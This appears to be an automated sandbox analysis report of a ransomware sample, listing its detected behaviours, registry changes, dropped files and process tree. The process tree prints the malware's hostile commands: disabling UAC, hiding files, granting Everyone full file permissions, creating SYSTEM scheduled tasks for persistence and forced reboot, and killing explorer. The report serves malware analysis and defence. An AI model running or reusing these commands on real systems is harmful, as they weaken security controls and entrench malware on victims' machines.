Analysis Overview
SHA256
a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6
Threat Level: Known bad
The file Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe was found to be: Known bad.
Malicious Activity Summary
Mimikatz
Troldesh, Shade, Encoder.858
BadRabbit
Modifies WinLogon for persistence
mimikatz is an open source tool to dump credentials on Windows
Checks for common network interception software
Enumerates VirtualBox registry keys
Stops running service(s)
UPX packed file
Disables Task Manager via registry modification
Disables RegEdit via registry modification
Modifies Windows Firewall
Executes dropped EXE
Downloads MZ/PE file
Modifies file permissions
Themida packer
Loads dropped DLL
Checks computer location settings
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Modifies WinLogon
Checks installed software on the system
Writes to the Master Boot Record (MBR)
Launches sc.exe
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
Program crash
NSIS installer
Suspicious use of FindShellTrayWindow
Modifies Internet Explorer settings
Views/modifies file attributes
Modifies registry key
Suspicious use of AdjustPrivilegeToken
Runs net.exe
Modifies Internet Explorer start page
Modifies Control Panel
Suspicious use of SetWindowsHookEx
System policy modification
Kills process with taskkill
Creates scheduled task(s)
Suspicious use of UnmapMainImage
Suspicious use of SendNotifyMessage
Modifies system certificate store
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Script User-Agent
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-09-29 12:38
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-09-29 12:38
Reported
2022-09-29 12:40
Platform
win7-20220812-en
Max time kernel
32s
Max time network
155s
Command Line
Signatures
BadRabbit
Mimikatz
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\Temp\\[email protected]" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Troldesh, Shade, Encoder.858
Checks for common network interception software
Enumerates VirtualBox registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
mimikatz is an open source tool to dump credentials on Windows
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Stops running service(s)
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| N/A | N/A | C:\Program Files (x86)\antiviruspc2009\avpc2009.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\antiviruspc2009\avpc2009.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\antiviruspc2009\avpc2009.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run\system = "C:\\Users\\Admin\\AppData\\Local\\Temp\\[email protected]" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Checks installed software on the system
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\antiviruspc2009\libltdl3.dll | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File opened for modification | C:\Program Files (x86)\antiviruspc2009\libltdl3.dll | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File created | C:\Program Files (x86)\antiviruspc2009\__tmp_rar_sfx_access_check_7109121 | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File created | C:\Program Files (x86)\antiviruspc2009\bzip2.dll | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File opened for modification | C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dll | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File opened for modification | C:\Program Files (x86)\antiviruspc2009\bzip2.dll | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File created | C:\Program Files (x86)\antiviruspc2009\avpc2009.exe | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File opened for modification | C:\Program Files (x86)\antiviruspc2009\avpc2009.exe | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File opened for modification | C:\Program Files (x86)\antiviruspc2009 | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File created | C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dll | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\cscc.dat | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\dispci.exe | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\__tmp_rar_sfx_access_check_7108169 | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File created | C:\Windows\antivirus-platinum.exe | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File opened for modification | C:\Windows\antivirus-platinum.exe | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File created | C:\Windows\MSCOMCTL.OCX | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File created | C:\Windows\302746537.exe | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File opened for modification | C:\Windows\infpub.dat | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\infpub.dat | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File created | C:\Windows\COMCTL32.OCX | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File opened for modification | C:\Windows\COMCTL32.OCX | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File opened for modification | C:\Windows\MSCOMCTL.OCX | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File opened for modification | C:\Windows\302746537.exe | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\[email protected] |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\[email protected] |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde | C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe
"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\WINDOWS\302746537.exe
"C:\WINDOWS\302746537.exe"
C:\Users\Admin\AppData\Local\6AdwCleaner.exe
"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM explorer.exe
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\cmd.exe
/c schtasks /Delete /F /TN rhaegal
C:\Program Files (x86)\antiviruspc2009\avpc2009.exe
"C:\Program Files (x86)\antiviruspc2009\avpc2009.exe"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\qiUYEYUk\vQkIcwYI.exe
"C:\Users\Admin\qiUYEYUk\vQkIcwYI.exe"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\cmd.exe
/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 386111685 && exit"
C:\ProgramData\IIwkMYAg\wqccYwoU.exe
"C:\ProgramData\IIwkMYAg\wqccYwoU.exe"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\cmd.exe
/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 14:56:00
C:\Windows\9DB7.tmp
"C:\Windows\9DB7.tmp" \\.\pipe\{5D983210-E07A-4516-81E0-21DD0A2D9431}
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\QWQgYkUo.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2036 -s 152
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\Fantom.exe
"C:\Users\Admin\AppData\Local\Temp\Fantom.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
C:\Users\Admin\AppData\Local\Temp\ose00000.exe
"C:\Users\Admin\AppData\Local\Temp\ose00000.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\AC18.tmp\302746537.bat" "
C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe
"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +h .
C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /f /pid 1692 & ping -n 3 127.1 & del /f /q "C:\Users\Admin\AppData\Local\Temp\[email protected]" & start C:\Users\Admin\AppData\Local\xeozppms.exe -f
C:\Users\Admin\AppData\Local\Temp\[email protected]
C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\is-DD3U8.tmp\is-2Q9DL.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DD3U8.tmp\is-2Q9DL.tmp" /SL4 $20190 "C:\Users\Admin\AppData\Local\Temp\[email protected]" 779923 55808
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 386111685 && exit"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 14:56:00
C:\Windows\SysWOW64\schtasks.exe
schtasks /Delete /F /TN rhaegal
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\saMkQEcw.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
C:\Windows\SysWOW64\cmd.exe
cmd /c 154151664462343.bat
C:\Users\Admin\AppData\Local\Temp\[email protected]
C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
C:\Users\Admin\AppData\Local\Temp\winsp2up.exe
"C:\Users\Admin\AppData\Local\Temp\winsp2up.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\fwUcoUQE.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\[email protected]
C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\[email protected]
C:\Users\Admin\AppData\Local\Temp\[email protected]
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s c:\windows\comctl32.ocx
C:\Windows\SysWOW64\cscript.exe
cscript.exe //nologo m.vbs
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\RYwAQMsk.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\netsh.exe
C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\@[email protected]
"C:\Users\Admin\AppData\Local\Temp\@[email protected]"
C:\Program Files (x86)\VAV\vav.exe
"C:\Program Files (x86)\VAV\vav.exe"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /pid 1692
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
